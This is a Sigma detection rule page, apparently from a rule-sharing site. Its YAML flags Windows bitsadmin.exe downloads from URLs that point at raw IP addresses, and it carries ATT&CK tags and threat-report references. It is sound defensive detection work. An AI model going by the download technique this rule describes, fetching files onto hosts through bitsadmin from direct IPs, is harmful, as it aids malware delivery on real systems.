Suspicious Download From Direct IP Via Bitsadmin
Detects usage of bitsadmin downloading a file using an URL that contains an IP
Sigma rule (View on GitHub)
1title: Suspicious Download From Direct IP Via Bitsadmin
2id: 99c840f2-2012-46fd-9141-c761987550ef
3related:
4 - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
5 type: similar
6status: test
7description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
8references:
9 - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
10 - https://isc.sans.edu/diary/22264
11 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
12 - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
13author: Florian Roth (Nextron Systems)
14date: 2022-06-28
15modified: 2023-02-15
16tags:
17 - attack.persistence
18 - attack.execution
19 - attack.stealth
20 - attack.t1197
21 - attack.s0190
22 - attack.t1036.003
23logsource:
24 category: process_creation
25 product: windows
26detection:
27 selection_img:
28 - Image|endswith: '\bitsadmin.exe'
29 - OriginalFileName: 'bitsadmin.exe'
30 selection_flags:
31 CommandLine|contains:
32 - ' /transfer '
33 - ' /create '
34 - ' /addfile '
35 selection_extension:
36 CommandLine|contains:
37 - '://1'
38 - '://2'
39 - '://3'
40 - '://4'
41 - '://5'
42 - '://6'
43 - '://7'
44 - '://8'
45 - '://9'
46 filter_seven_zip:
47 CommandLine|contains: '://7-' # For https://7-zip.org/
48 condition: all of selection_* and not 1 of filter_*
49falsepositives:
50 - Unknown
51level: high
52regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml
References
Related rules
- File Download Via Bitsadmin
- File Download Via Bitsadmin To A Suspicious Target Folder
- File With Suspicious Extension Downloaded Via Bitsadmin
- Suspicious Download From File-Sharing Website Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address